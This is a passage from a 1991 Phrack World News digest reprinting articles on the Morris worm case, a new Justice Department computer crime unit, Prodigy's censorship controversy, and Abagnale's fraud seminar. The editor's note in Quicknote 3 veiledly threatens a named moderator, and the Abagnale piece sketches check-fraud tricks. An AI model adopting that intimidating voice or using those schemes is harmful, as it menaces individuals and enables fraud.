technology's rapid advance, said Thomas Guidoboni, the Washington, D.C.-based
attorney who defended Morris.

Neither Guidoboni nor Morris were surprised by the Supreme Court's refusal to
hear his appeal, according to Guidoboni.  "Robert's case had a particular
problem in that it was the first one involving the 1986 act.  They like to take
cases after the circuit courts had had some chance to play with them and see if
there is a disagreement."

Morris is working as a computer programmer in Cambridge, Massachusetts for a
company that "knows who he is and what he's done," Guidoboni said.  He declined
to identify the company.

<Editor's Note: Morris was actually the SECOND person to be tried under the
 1986 Computer Fraud and Abuse Act.  The first person was Herbert Zinn, Jr.
 a/k/a Shadow Hawk of Chicago, Illinois, who was convicted in 1989 in a
 prosecution led by William Cook, a now former assistant U.S. attorney whose
 name most of you should recognize from the Craig Neidorf (Knight Lightning)
 and Lynn Doucette (Kyrie) cases.

 Zinn was tried as a minor and therefore in a bench trial before a sole judge.
 Morris is the first person to be tried under the Act in front of a jury.
 Zinn's conviction earned him 10 months in a juveniles prison facility in South
 Dakota, a fine of $10,000, and an additional 2 1/2 years of probation that
 began after his prison term ended.

 For additional information about the Shadow Hawk case, please read "Shadow
 Hawk Gets Prison Term," which appeared in Phrack World News, Issue 24,
 Part 2.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Justice Unit Spurred On By Cross-Border Hackers                October 21, 1991
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
by Michael Alexander (ComputerWorld)(Page 6)

Washington D.C. -- The U.S. Department of Justice's formal launch of a computer
crime unit was prompted largely by an alarming rise in computer invasions that
traverse geographic and jurisdictional boundaries, according to a top Justice
Department official.

Robert Mueller III, assistant U.S. attorney general, said the Justice
Department needs to be better prepared to prosecute computer criminals.  he is
one of the architects of a five-person unit recently established by the justice
department expressly to combat computer crime.

"One of the principal functions of the unit is to anticipate areas where
federal, state, and local law enforcement will have to expend resources in the
future," Mueller said.  "One that comes immediately to our attention is crime
related to computers used as a target as in The Cuckoo's Egg."  He was
referring to author Clifford Stoll's account of how he tracked West German
hackers who penetrated U.S. computers for the KGB in exchange for cash and
cocaine.

Increasingly, computer crimes cut across state and international boundaries,
making them difficult to investigate because of jurisdictional limits and
differing laws, Mueller said.  The computer crime unit will be charged with
coordinating the efforts of U.S. attorneys general nationwide during
investigations of crimes that may have been committed by individuals in several
states.

One of the unit's first assignments will be to take a pivotal role in OPERATION
SUN-DEVIL, last year's much-publicized roundup of computer hackers in several
states.  That investigation is still under way, although no arrests have
resulted, Justice Department officials said.

The unit will coordinate efforts with foreign law enforcers to prosecute
hackers who enter U.S. computer systems from abroad while also working to
promote greater cooperation in prosecuting computer criminals according to
Mueller.

The unit will also assist in investigations when computers are used as a tool
of a crime -- for example, when a computer is used to divert electronically
transferred funds -- and when computers are incidental to a crime, such as when
a money launderer uses a computer to store records of illegal activities,
Mueller said.

"There have been many publicized cases involving people illegally accessing
computers, from phone phreaks to hackers trying to take military information,"
said Scott Charney, chief of the new computer unit.  "Those cases have high
importance to us because any time that computers are the target of an offense,
the social cost is very high.  If you bring down the Internet and cripple 6,000
machines and inconvenience thousands of users, there is a high social cost to
that type of activity."

The computer crime unit will also work to promote closer cooperation between
the Justice Department and businesses that have been the victims of computer
crime, Charney said.

Law enforcers are better trained and more knowledgeable in investigating and
prosecuting computer crimes, Charney said.  "Businesses need not be concerned
that we are going to come in, remove all of their computers, and shut their
businesses down.  FBI and Secret Service agents can go in and talk to the
victim in a language they understand and get the information they need with a
minimum amount of intrusion."

<Editor's Note:  "Businesses need not be concerned that we are going to come
 in, remove all of their computers, and shut their businesses down."  Excuse
 me, but I think STEVE JACKSON GAMES in Austin, Texas might disagree with that
 statement.  Mr. Charney -- Perhaps you should issue an apology!>

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                           V  I  E  W  P  O  I  N  T

Let's Look Before We Legislate                                 October 21, 1991
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
by Marc Rotenberg (ComputerWorld)(Page 25)

    "Laws Are Adequate To Handle Computer Crime -- 'Net Police' Not Needed"

The U.S. Department of Justice is now circulating a proposal to expand the
reach of federal computer crime law.  On first pass, this might seem a sensible
response to concerns about computer crime.  The reality, however, it that the
current federal law is more than adequate and the Justice Department proposal
is poorly conceived.

The Justice Department proposal will give federal agencies broad authority to
investigate computer crime, allowing them to intercede in any situations
involving a computer hooked to a network.

Creating a worm or virus could become a felony act, no questions asked.
Espionage laws would be broadened and intent requirements would be lowered.
Certain procedural safeguards would be removed from existing law.

CURRENT LAW ADEQUATE

Taken as a whole, the proposal will make it possible for the federal government
to prosecute many more computer crimes, but the question is whether this
additional authority will improve computer security.  Between the current
federal statute, the Morris decision, and the sentencing guidelines, federal
prosecutors already have more than enough tools to prosecute computer crime.

Under the Computer Fraud & Abuse Act, passed in 1984 and amended in 1986, the
unauthorized use of a computer system is a felony.  Though the act does not
define what "authorization" is or how it is obtained, a person found guilty
faces up to five years in jail and fines of $250,000.  It is a far-reaching law
whose boundaries are still not known.

THE MORRIS FACTOR

The Morris case strengthened the hand of federal prosecutors still further.
The judge ruled that it was not necessary for the government to prove that
Morris intended the harm that resulted when the worm was released, only that he
intended unauthorized use when he did what he did.

>From a common law viewpoint, that's a surprising result.  Traditional criminal
law distinguishes between trespass, burglary, and arson.  In trespass, which is
a misdemeanor, the offense is entering onto someone else's property.  Burglary
is simple theft and arson is destruction.  To punish a trespasser as an
arsonist is to presume an intent that may not exist.

A federal appeals court affirmed the Morris decision, and the Supreme Court has
refused to hear his appeal, so now the computer crime statute is essentially a
trip-wire law.  The government only has to show that the entry was unauthorized
-- not that any resulting harm was intentional.

There is another aspect of the Morris case that should be clearly understood.
Some people were surprised that Morris served no time and jumped to the
conclusion that sentencing provisions for this type of offense were
insufficient.  In fact, under the existing federal sentencing guidelines,
Morris could easily have received two years in jail.  The judge in Syracuse,
New York, considered that Morris was a first-time offender, had no criminal
record, was unlikely to commit a crime in the future, and, not unreasonably,
decided that community service and a stiff fine were appropriate.

To "depart" as the judge did from the recommended sentence was unusual.  Most
judges follow the guidelines and many depart upwards.

That said, if the Department of Justice persists in its efforts, there are at
least three other issues that should be explored.

UNANSWERED QUESTIONS

First there is the question of whether it is sensible to expand the authority
of federal agents at the expense of local police and state government.  If
theft from a cash register is routinely prosecuted by local police, why should
the FBI be called in if the cash register is a computer?

What will happen to the ability of state government to tailor their laws to
their particular needs?  Do we really want "Net Police"?

There is also the need to explore the government's performance in recent
computer crime investigations before granting new powers.  For example, the
botch Operation Sun-Devil raid, which involved almost one quarter of all Secret
Service agents, resulted in hardly a conviction.  (A good cop could have done
better in a night's work.)

In a related investigation, Steve Jackson, the operator of a game business in
Texas was nearly forced out of business by a poorly conceived raid.

In fact, documents just released to Computer Professionals for Social
Responsibility by the Secret Service under the Freedom of Information Act raise
substantial questions about the conduct, scope, and purpose of Operation
Sun-Devil investigations.  They reveal, for example, that the Secret Service
monitored and downloaded information from a variety of on-line newsletters and
conferences.

A congressional hearing to assess Operation Sun-Devil would certainly be in
order before granting federal officials new powers.

PROTECTION OF RIGHTS

Finally we should not rush to create new criminal sanctions without fully
recognizing the important civil liberties interests in information
technologies, such as the rights of privacy and free expression.  There are,
for example, laws that recognize a special First Amendment interest in newsroom
searches.

But no case has yet made clear the important principle that similar protections
should be extended to computer bulletin boards.  New criminal sanctions without
necessary procedural safeguards throws off an important balance in the criminal
justice system.

Expanding the reach of federal law might sound good to many people who are
concerned about computer crime, but broadening criminal law is always
double-edged.  Could you prove to a court that you have never used a computer
in an "unauthorized" manner?

<Editor's Note:  Marc Rotenberg is the Director of the Washington office of
 Computer Professionals for Social Responsibility and he has testified in both
 the House of Representatives and the Senate on computer crime legislation.>
_______________________________________________________________________________

PWN Quicknotes
~~~~~~~~~~~~~

1.  Operation Sun-Devil Scope Emerges (ComputerWorld, 10/14/91, page 119)
--
    The Computer Professionals for Social Responsibility (CPSR), an advocacy
    group, received more than 2,400 documents from the U.S. Secret Service
    under the Freedom of Information Act.  The documents relate to Operation
    Sun-Devil, last year's nationwide dragnet through the hacker underground.
    An early look at the documents reveals that the scope of the operation was
    considerably broader than the U.S. Secret Service has admitted, said Marc
    Rotenberg, director of CPSR's Washington, D.C. office.  CPSR will soon hold
    a press conference to discuss the findings, he added.
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

2.  6 Police Employees Probed for Wiretaps (Washington Post/AP, 10/24/91, page
    A4) -- Jefferson City, Missouri -- Missouri's Highway Patrol is
    investigating six employees implicated in three illegal wiretaps, officials
    said.

    The wiretaps were "stupid" and were intended to "gain personal information
    in an effort to supervise subordinates," said Colonel C.E. 'Mel' Fisher,
    the patrol's chief.

    Fisher said that six employees are on administrative leave without pay
    after a two-month internal investigation confirmed conversations were
    recorded at patrol headquarters and at a troop office in Kirkwood,
    Missouri.

    Fisher did not identify the employees, who face hearings that could lead
    to possible penalties ranging from a written reprimand to dismissal.  It is
    a federal felony to conduct an illegal wiretap.  He said the FBI
    investigated the wiretaps.

    Major Bobby G. Gibson, chief of the patrol's Criminal Investigation Bureau,
    in which two of the wiretaps occurred, committed suicide on October 9,
    1991.  He was among five defendants in a $7 million federal lawsuit filed
    recently by a black patrolman, Corporal Oliver Dixon, who alleged he had
    been wiretapped and denied promotions because of his race.  All of the
    defendants, including Fisher, are white.
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
3.  Patrick Townson, the moderator of the Internet's Telecom Digest
    (comp.dcom.telecom) was less than pleased when an unknown person placed
    Phrack 34 into alt.dcom.telecom.  Townson consistently preaches about the
    evils of hacking, but we know that he did not learn everything he knows
    about telecommunications in the classroom.  See you after World War Three
    Pat!  We know who you are, we know who you WERE and we know what crimes
    you have committed in the realm of telecommunications.  We're anxious to
    talk some more with you about this in the near future.

    See below:

    "I assume you saw the stuff which was left in alt.dcom.telecom today:
    A whole series of messages telling how to break into several voicemail
    systems; how to break into the MILNET; a program designed to discover
    passwords; and other obnoxious files.  All of them were left by the same
    anonymous user at the same non-existent site.  Siemens Medical Systems
    (one of the victims in the theft-of-voicemail-services tutorial in
    alt.dcom.telecom today) has been notified that their 800 number link to
    voicemail is now under attack, and given the box number involved.  Like
    cockroaches, you can stomp on those people all you like; they seem to
    survive.  One person has said in the event of WW-3, the only species to
    survive will be the cockroaches and the hackerphreaks.  Good socially
    responsible computing, that's what it is!   PAT"
_______________________________________________________________________________

4.  The existence of back issues of Phrack Inc. found in a user's home
    directory was enough for a system administrator at Tufts University in
    Massachusetts to revoke a users account.  Michael Godwin, an attorney for
    the Electronic Frontier Foundation went to bat for this individual and
    succeeded in restoring the user's account.  The incident prompted the
    following response by a reader of Telecom Digest (comp.dcom.telecom):

     On Oct 19 at 11:51, TELECOM Moderator writes:

     > Is it easier and more pragmatic for a
     > system administrator to answer to his/her superiors regarding files at
     > the site which harassed or defrauded some third party (ie. telco) or
     > to simply remove the files and/or discontinue the feed"   PAT]

     But this requires a judgment call on the part of the system
     administrator, does it not?  Most of the system administrators that I
     know are too busy administering the system to worry about this file or
     that feed, except perhaps as it relates to traffic volume or disk space
     consumed.

     Will we ever get to the point where those in charge will stop dreaming of
     practicing mind control?  I am so sick of those who are paranoid that
     someone somewhere may actually express an uncontrolled thought or idea to
     someone else.

     Ah, the advantages of owning one's own UUCP site ...
_______________________________________________________________________________

5.   The National Public Network Begins Now.  You Can Help Build it.

     Telecommunications in the United States is at a crossroads.  With the
     Regional Bell Operating Companies now free to provide content, the shape
     of the information networking is about to be irrevocably altered.  But
     will that network be the open, accessible, affordable network that the
     American public needs?  You can help decide this question.

     The Electronic Frontier Foundation recently presented a plan to Congress
     calling for the immediate deployment of a national network based on
     existing ISDN technology, accessible to anyone with a telephone
     connection, and priced like local voice service.  We believe deployment of
     such a platform will spur the development of innovative new information
     services, and maximize freedom, competitiveness, and civil liberties
     throughout the nation.

     The EFF is testifying before Congress and the FCC; making presentations to
     public utility commissions from Massachusetts to California; and meeting
     with representatives from telephone companies, publishers, consumer
     advocates, and other stakeholders in the telecommunications policy debate.

     The EFF believes that participants on the Internet, as pioneers on the
     electronic frontier, need to have their voices heard at this critical
     moment.

     To automatically receive a description of the platform and details, send
     mail to archive-server@eff.org, with the following line:

     send documents open-platform-overview

     or send mail to eff@eff.org.
_______________________________________________________________________________

6.  The September/October 1991 issue of The Humanist has a cover story
    regarding Cyberspace, rights and freedoms on nets such as Usenet, and makes
    reference to Craig Neidorf, Jolnet, Prodigy and other matters.
_______________________________________________________________________________

7.  A Virginia Beach restaurateur plead guilty to illegally taping a telephone
    call by Governor L. Douglas Wilder and said he arranged for the tape to be
    delivered to the staff of Senator Charles Robb, D-Va., hoping it would be
    damaging to Wilder and politically helpful to Robb.

    Robert Dunnington, a onetime social companion of Robb's, admitted in
    federal court that he intercepted a 1988 car phone call by then-Lt.
    Governor Wilder as part of his hobby of monitoring and recording cellular
    calls.

    From February 1988 to October 1990, Dunnington overheard and taped hundreds
    of calls and, his attorney said, it was "just happenstance" that Wilder's
    call was picked up.  (Washington Post)
_______________________________________________________________________________

8.  A Federal District Judge in New York ruled that a computer-network company
    is not legally liable for the contents of information it disseminates.
    While the decision could be influential because it tackles free speech on
    an electronic network, it is not clear how the ruling would affect bulletin
    boards ^S^Qon which users add comments.  The decision concerned an electronic
    gossip column carried by CompuServe.  In the decision, the judge stated
    "CompuServe has no more editorial control over such a publication than
    does a public library, bookstore or newsstand, and it would be no more
    feasible for CompuServe to examine every publication it carries for
    potentially defamatory statements than it would be for any other
    distributor to do so."  (Wall Street Journal, October 31, 1991)
_______________________________________________________________________________


--------------------------------------------------------------------------------


                                ==Phrack Inc.==

                 Volume Three, Issue Thirty-five, File 12 of 13

              PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
              PWN                                             PWN
              PWN              Phrack World News              PWN
              PWN                                             PWN
              PWN           Issue XXXV / Part Three           PWN
              PWN                                             PWN
              PWN            Compiled by Dispater             PWN
              PWN                                             PWN
              PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN

Prodigy Stumbles as a Forum...Again
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
by Mike Godwin (Electronic Frontier Foundation)

     On some days, Prodigy representatives tell us they're running "the Disney
Channel of online services."  On other days the service is touted as a forum
for "the free expression of ideas."  But management has missed the conflict
between these two missions.  And it is just this unperceived conflict that has
led the B'nai B'rith's Anti-Defamation League to launch a protest against the
online service..

     On one level, the controversy stems from Prodigy's decision to censor
messages responding to claims that, among other things, the Holocaust never
took place.  These messages--which included such statements as "Hitler had some
valid points" and that "wherever Jews exercise influence and power, misery,
warfare and economic exploitation ... follow"--were the sort likely to stir up
indignant responses among Jews and non-Jews alike.  But some Prodigy members
have complained to the ADL that when they tried to respond to both the overt
content of these messages and their implicit anti-Semitism, their responses
were rejected by Prodigy's staff of censors.

     The rationale for the censorship?  Prodigy has a policy of barring
messages directed at other members, but allows messages that condemn a group.
The result of this policy, mechanically applied, is that one member can post a
message saying that "pogroms, 'persecutions,' and the mythical holocaust" are
things that Jews "so very richly deserve" (this was an actual message).  But
another member might be barred from posting some like "Member A's comments are
viciously anti-Semitic."  It is no wonder that the Anti-Defamation League is
upset at what looks very much like unequal treatment.

     But the problem exposed by this controversy is broader than simply a badly
crafted policy.  The problem is that Prodigy, while insisting on its Disney
Channel metaphor, also gives lip service to the notion of a public forum.
Henry Heilbrunn, a senior vice president of Prodigy, refers in the Wall Street
Journal to the service's "policy of free expression," while Bruce Thurlby,
Prodigy's manager of editorial business and operations, invokes in a letter to
ADL "the right of individuals to express opinions that are contrary to personal
standards or individual beliefs."

     Yet it is impossible for any free-expression policy to explain both the
allowing of those anti-Semitic postings and the barring of responses to those
postings from outraged and offended members.  Historically, this country has
embraced the principle that best cure for offensive or disturbing speech is
more speech.  No regime of censorship--even of the most neutral and well-
meaning kind--can avoid the kind of result that appears in this case: some
people get to speak while others get no chance to reply.  So long as a board of
censors is in place, Prodigy is no public forum.
        
     Thus, the service is left in a double bind.  If Prodigy really means to be
taken as a computer-network version of "the Disney Channel"--with all the
content control that this metaphor implies--then it's taking responsibility for
(and, to some members, even seeming to endorse) the anti-Semitic messages that
were posted.  On the other hand, if Prodigy really regards itself as a forum
for free expression, it has no business refusing to allow members to respond to
what they saw as lies, distortions, and hate.  A true free-speech forum would
allow not only the original messages but also the responses to them.

     So, what's the fix for Prodigy?  The answer may lie in replacing the
service's censors with a system of "conference hosts" of the sort one sees on
CompuServe or on the WELL.  As WELL manager Cliff Figallo conceives of his
service, the management is like an apartment manager who normally allows
tenants to do what they want, but who steps in if they do something
outrageously disruptive.  Hosts on the WELL normally steer discussions rather
than censoring them, and merely offensive speech is almost never censored.

     But even if Prodigy doesn't adopt a "conference host" system, it
ultimately will satisfy its members better if it does allow a true forum for
free expression.  And the service may be moving in that direction already:
Heilbrunn is quoted in the Wall Street Journal as saying that Prodigy has been
loosening its content restrictions over the past month.  Good news, but not
good enough--merely easing some content restrictions is likely to be no more
successful at solving Prodigy's problems than Gorbachev's easing market
restrictions was at solving the Soviet Union's problems.  The best solution is
to allow what Oliver Wendell Holmes called "the marketplace of ideas" to
flourish--to get out of the censorship business.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Computer Network to Ban 'Repugnant' Comments
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>From Washington Post

     Prodigy has been charged with allowing "antisemitic slurs" to run on its
network.  Prodigy officials said they would *not* censor discussion of
controversial subjects, such as the one that has been raging over the net for
several months -- whether the Holocaust was a hoax.

     The controversial message that was labeled "repugnant" included the
statements: "Hitler had some valid points...", and "...whenever Jews exercise
influence and power, misery, warfare and economic exploitation [are the
result]".  There were six other messages that the Anti-Defamation League of
B'nai B'rith are complaining about.  The Hitler message was not available to
all subscribers, it was just personal mail between users.  The person who
received the mail brought it to the ADL's attention.

     Civil liberties groups have compared computer networks to telephone
companies, which do not censor calls.  However, Prodigy officials object to
that analogy, saying it is more like a newspaper, and that Prodigy must judge
what is acceptable and what is not, much as a newspaper editor must.

     Prodigy officials take the position of, and I quote, "we were speaking in
broader terms ... we were focused on the broad issue of free expression".
_______________________________________________________________________________

More on Proctor & Gamble                                        August 15, 1991
~~~~~~~~~~~~~~~~~~~~~~~
by Randall Rothenberg (New York Times)
Further Reading:  Phrack Inc., Issue 33 , File.12, "Proctor & Gamble"

     Law-enforcement officials in Ohio have searched the records of every
telephone user in southwestern Ohio to determine who, if anyone, called a Wall
Street Journal reporter to provide information that Proctor & Gamble said was
confidential and protected by state law.
        
     The investigation goes far beyond examining the telephone records of
current and former employees of the giant consumer products company, an inquiry
the Hamilton County prosecutor's office confirmed on Monday.  The Journal
reported the scope of the investigation Thursday.

     The prosecutor, Arthur Ney Jr., acting on a complaint by Procter & Gamble,
ordered Cincinnati Bell to turn over all the telephone numbers from which
people called the home or office of the reporter, Alecia Swasy, from March 1 to
June 15.

     The situation began sometime before June 17 when Procter & Gamble, which
makes Tide detergent, Crest toothpaste and other familiar supermarket products,
asked the Cincinnati police to determine whether current or former employees
were leaking confidential corporate information to The Wall Street Journal.

     On Monday the newspaper reported that the company had been bothered by two
news articles published on June 10 and June 11 written by Ms. Swasy, a reporter
based in Pittsburgh who covers Procter & Gamble.  The articles cited
unidentified sources saying that a senior executive was under pressure to
resign from the company, and that it might sell some unprofitable divisions.

     But a spokeswoman for Procter and Gamble, Sydney McHugh, said Thursday
that the company "had been observing a disturbing pattern of leaks" since the
beginning of the year.  She refused to elaborate, but said the decision to
pursue legal action was reviewed at several levels in the company and was made
by Jim Jessee, a corporate security officer.

     Two Ohio statutes protect the unauthorized disclosure of trade secrets.
One makes it a felony to transmit formulas, customer lists or other tangible
pieces of information that would be valuable to a company and its competitors.
But another, broader law makes it a misdemeanor to disclose "any confidential
matter or information" without the company's consent.

     The Cincinnati police approached the Hamilton County prosecutor's office,
which sought and received from a grand jury a subpoena for telephone records.

     A copy of the subpoena, dated June 17, was given to The New York Times by
someone involved in the case who insisted on anonymity.  The subpoena ordered
Cincinnati Bell to "identify all (513) area code numbers that have dialed" Ms.
Swasy's home or office telephones in Pittsburgh during an eight-week period
that started on March 1.

     Cincinnati Bell serves 655,297 telephone numbers in the 513 area code, in
an area covering 1,156 square miles, said Cyndy Cantoni, a spokeswoman for the
company.  In the company's entire jurisdiction, which also covers parts of
Kentucky and Pennsylvania, about 13 million toll calls are placed in an average
month, she said.

     Ms. Cantoni said she could not comment on what Cincinnati Bell turned over
to the authorities, but said the company routinely complied with subpoenas.
Under normal procedure, the company's computers would have automatically
searched its customer list and printed out only the originating numbers, and
not the names or addresses, of calls to Ms. Swasy's numbers, Ms. Cantoni said.

     The Wall Street Journal, which is published by Dow Jones & Co., reported
on Monday that neither Ms. Swasy nor executives at the Journal were informed of
the subpoena by the authorities.

     Neither Terry Gaines, a first assistant prosecutor, nor Ed Ammann, a
police department colonel involved with the investigation, returned repeated
calls to their offices.

     Alan F. Westin of Columbia University, an authority on technology and
privacy issues, said the legality of the Ohio authorities' search for the
Procter & Gamble whistleblower may depend on how the investigation was pursued.

     If Procter & Gamble turned over the names and phone numbers of present and
former employees to the police and the police matched that list against the
numbers they were given by the telephone company, the rights of other,
uninvolved parties may not have been violated, Westin said.  But if the police
learned the names of people unaffiliated with Procter & Gamble who called the
Journal's reporter, he said, or if they turned over a list of numbers to
Procter & Gamble for research, some Ohio residents' Fourth Amendment
protections may have been sullied.

     "When technology allows you to run millions of calls involving 650,000
telephone subscribers through a computer in order to identify who called a
person, potentially to find out whether a crime was committed, you raise the
question of whether technological capacity has gone over the line in terms of
what is a reasonable search and seizure," Westin said.
_______________________________________________________________________________

Expert Fraud Shares Tricks of His Trade                         October 7, 1991
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
by Bob Reilly (New York Times)

     PHOENIX -- A freelance writer didn't think the $333 that Forbes magazine
paid him for a one-page article was enough money so he used his personal
computer to duplicate the check in the amount of $30,000.  And, the check
cleared.

     A handyman fixes a bedroom window and gets paid by check.  The handyman
copies down the homeowner's bank account number, name, address and check number
sequences and sends $4.95 to a company that prints fancy colored checks.  The
handyman masters the homeowner's signature and then proceeds to cash the checks
after they arrive.

     American Express and Mastercard traveler's checks are duplicated on a
colored photostat machine and spent in hotels and restaurants.

     A man rents a banquet room in a hotel for $800 and gets the bill in the
mail a few days later.  The man sends in a check for $400 with the notation
"paid in full" written in the lower left-hand corner.  The hotel cashes the
check and sends a notice to the man saying $400 is still owed.  The man refuses
to pay the $400 and wins in court because the law says by cashing the check the
hotel conceded the debt was paid.

     White-collar crime amounts to more than $50 billion a year, said Frank
Abagnale, who cited the examples at a business-sponsored seminar in the Phoenix
Civic Center.  By contrast, bank robbers, who get most of the media attention,
abscond with a paltry $450 million, he said.

     Abagnale is said to have conducted scams and frauds in 26 nations.  Known
as "The Imposter," he now advises government and industry.  He says he served
six years in jail in France, Sweden and the U.S. for his crimes, which included
writing bad checks for more than $2.5 million.

     "As technology improves, so does the ability to commit fraud," said
Abagnale.

     He claims that at 16 he impersonated an airline pilot, at 18 was a chief
resident pediatrician in a Georgia hospital, at 19 passed the Louisiana state
bar exam and served as an assistant attorney general for the state.

     Abagnale also claims he never flew an airplane or treated a patient but
along the way used false names to get jobs and pass bad checks.  He claims he
even got a job at age 20 teaching sociology at Brigham Young University,
beating out three Ph.D.s for the job.

     "I was always just one chapter ahead of the class," he said.  Demeanor,
style, confidence, clothes and the overt display of wealth also help the con
man, Abagnale said.
        
     Abagnale claimed he got one teller to cash a napkin because he drove up to
the bank in a chauffeur-driven Rolls Royce and entered wearing a $600 suit and
all the confidence of a billionaire.  The feat was recorded for television by
CBS, he said.

     Another time he supposedly put the numbers of the bank account he was
using on a bunch of deposit slips, placed the deposit slips in a bank for
public use, and in one day alone more than $40,000 was deposited into his
account by unsuspecting customers who picked up his slips because they had
either run out of their own or hadn't yet got their own deposit slips.
  
     Abagnale asserted that there are several ways to discourage fraud, 
including:

       -- Use checks that are impossible to duplicate on a home computer.
       -- Don't cash checks that don't have at least one rough edge.
       -- Scan travelers checks by looking for impossible to reproduce
          pictures or symbols that can only be seen at eye level or by
          wetting the back, left-hand side of an American Express traveler's
          check, which will smudge if it is authentic.

     Abagnale is known as the author of a book called "Catch Me If You Can."

     "I always knew I would eventually get caught," he said.  "Only a fool
believes he won't.  The law sometimes sleeps, but it never dies."

     Abagnale claimed he started a life of crime when his parents divorced and
he was forced to choose between living with his mother or father.  He said he
couldn't make the choice and ran away.
_______________________________________________________________________________
       
Dumb Jocks Learn First Lesson of Phreaking                     October 17, 1991
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>From Associate Press

     Four current Ball State University basketball players have admitted to
investigators that they charged a total of $820.90 in unauthorized long
distance calls. School officials announced the preliminary findings in the
first phase of their report the the NCAA.  What the investigators found, in
regards to the unauthorized calls, was the following information:

Person             Yr   Calls  Cost
~~~~~~~~~~~~~~~~ ~~~  ~~~~~  ~~~~~~~
Jeermal Sylvester  Sop  255    $769.93
Chandler Thompson  Sen  28     $ 45.14
Michael Spicer     Sen  3      $  4.43
Keith Stalling     Sen  1      $  1.40

     Investigators reported three of the men said former players had provided
the long distance credit card numbers or authorization codes on which the calls
were made.  The fourth player Keith Stalling, could not explain how his call
had been charged to the university.  Head basketball coach Dick Hunsaker
reiterated that neither he nor the coaching staff had made available the
numbers that were assigned to the coaches.

     "When this problem was first discovered back in August, it came as a shock
to me," Hunsaker said.  "I'm disappointed with the judgement of the players
involved, but I'm glad we're getting to the bottom of it quickly and clearing
it up before the season starts."

     "Our attention now will focus on former players and other people not
connected with the basketball program who might have used the same credit cards
and access numbers," said the university's auditor.  The investigation that
began in August was conducted by the Ball State university's auditor and
Department of Public Safety.  The investigation started one week after a
routine review of telephone records by athletic department officials.  At the
time, investigators said the total cost of the unauthorized calls was in the
thousands of dollars.
_______________________________________________________________________________

Silicon Government in California                               October 28, 1991
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>From UPI Sacramento

     California unveiled an easy-to-use computer system Wednesday that is
designed to tell people about such topics as statewide job openings, where
parents can find child care and how to re-register a car.

     Officials described the experimental "Info/California" program as an
information-dispensing version of an automatic teller machine at a bank.  It
will operate in Sacramento and San Diego as a pilot project for the next nine
months.

     Users will obtain free information on a variety of state services as they
touch the television-like computer screen to evoke an on-screen narration and
color graphics in English, Spanish and potentially other languages.

     "It literally puts state government at our fingertips," a computerized
image of Gov. Pete Wilson said at a Capitol news conference.
    
     Secretary Russell Gould of the Health and Welfare Agency said the system
may be especially useful to announce job openings as the economy rebounds from
the recession. Job-seekers will need a fourth-grade literacy level to use the
machine, which will refer them to Employment Development Department offices for
follow-up.

     Director Frank Zolin of the Department of Motor Vehicles said the system
will benefit 20 million drivers who want vehicle registration renewals, vanity
license plate orders and faster service.

     John Poland, Central California manager for IBM -- the state's partner in
the project -- said that besides telling the public about job opportunities, it
will allow Californians to order birth certificates and get information about
education, transportation, health and welfare at more than one site.

     During the nine-month trial, people will use the system at 15 kiosks in
Sacramento and San Diego that will be similar to, and eventually integrated
with, local system kiosks such as those in the courts in Los Angeles and Long
Beach, and for community services in San Diego and Tulare counties.

     Info/California was authorized under 1988 legislation. It is based on an
experimental touchscreen network in Hawaii that 30,260 people used over a six-
month period.

     The state spent about $300,000 on the project, and IBM invested about $3
million to develop the technology.  By performing functions now done by humans,
the system may ultimately replace some state workers and produce cost savings
for taxpayers.

     "We're working smart here," Gould said.  "This may diminish some of the
need for new state workers."
_______________________________________________________________________________

Digital Tapes Deal Endorsed by Music Industry                  October 30, 1991
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>From (Congressional Monitor)

     Record industry executives joined with retailers and consumer groups in
endorsing legislation (S 1623) that would pave the way for widescale
introduction of digital audio tapes into the U.S. marketplace.

     For the first time, consumers would be allowed to legally make copies of
prerecordings for home use.

     The agreement would allow artists, songwriters, and record companies to
collect royalty fees on the sale of blank tapes and digital audio recorders.

     In addition, an electronics chip will be placed in the recorders to
prevent anything other than the original recording to be copied.

     In testimony before the Senate Judiciary Committee's Subcommittee on
Patents, Copyrights, and Trademarks, pop star Debbie Gibson said that many
artists had been concerned that digital copying could spell the end of a
profitable music industry.

     Unlike conventional tapes, digital audio recorders allow consumers to make
a perfect copy of a prerecording.  The record industry says it already loses $1
billion a year in sales due to illegal copying.  And, the industry says,
unchecked digital technology would dramatically increase that figure.

     Electronics manufacturers and retailers won the assurance that they will
not be sued for copyright infringement due to the sale of blank tapes or
recorders.
_______________________________________________________________________________

Computer Cryptography:  A Cure For The Common Code
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

     Anyone can sign a postcard, but how do you sign a piece of electronic
mail?  Without a "signature" to demonstrate that, say, an electronic transfer
of funds really comes from someone authorized to make the transfer, progress
towards all-electronic commerce is stymied.  Ways of producing such signatures
are available, thanks to the technology of public-key cryptography.  They will
not work to everyone's best advantage, though, until everyone uses the same
public- key system.

     It is an obvious opportunity for standards-makers -- but in America they
have turned up their noses at all the variations on the theme currently in use.
The alternative standard for digital signatures now offered by America's
National Institute of Standards and Technology (NIST) has brought a long-
simmering controversy back to the boil.

     Public-key cryptography could become one of the most common technologies
of the information age, underpinning all sorts of routine transactions.  Not
only does it promise to provide the digital equivalent of a signature, it could
also give users an electronic envelope to keep private messages from prying
eyes.  The idea is to create codes that have two related keys.  In conventional
cryptography the sender and receiver share a single secret key; the sender uses
it to encode the message, the receiver to decode it.

     In public-key techniques, each person has a pair of keys: a disclosed
